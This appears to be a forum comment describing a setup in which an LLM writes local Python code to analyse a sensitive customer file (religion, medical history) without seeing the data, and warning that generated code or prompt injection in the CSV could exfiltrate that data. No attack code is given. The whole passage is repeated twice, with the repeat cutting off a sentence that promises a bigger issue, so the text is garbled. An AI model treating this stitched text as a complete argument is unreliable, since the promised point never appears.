Prompt: "I have a file of 315 customers with their IP, behavior, religious affiliation and previous purchases plus medical history. I want to figure out if I have any customers whose religious affiliation pre-dates a post-surgery stay in hospital."
Data: a huge CSV file which, as you can tell, contains incredibly sensitive/legally impactful information.
With this system, you send the prompt to GPT-4 or Claude, and it doesn't see your data at all. It just writes a python program that can do the analysis.
You run the program locally on C:/Users/passwordoops/SuperSensitiveData/Confidential.csv
You get the result.
OpenAI has never seen your data.
It's a win for confidentiality.
(of course, that's if the LLM didn't give you a program that would exfiltrate your prompt, and if the CSV contains no prompt injection to exfiltrate the data, etc. This system is a security nightmare.)
But that's not the biggest issue in most cases.
Prompt: "I have a file of 315 customers with their IP, behavior, religious affiliation and previous purchases plus medical history. I want to figure out if I have any customers whose religious affiliation pre-dates a post-surgery stay in hospital."
Data: a huge CSV file which, as you can tell, contains incredibly sensitive/legally impactful information.
With this system, you send the prompt to GPT-4 or Claude, and it doesn't see your data at all. It just writes a python program that can do the analysis.
You run the program locally on C:/Users/passwordoops/SuperSensitiveData/Confidential.csv
You get the result.
OpenAI has never seen your data.
It's a win for confidentiality.
(of course, that's if the LLM didn't give you a program that would exfiltrate your prompt, and if the CSV contains no prompt injection to exfiltrate the data, etc. This system is a security nightmare.)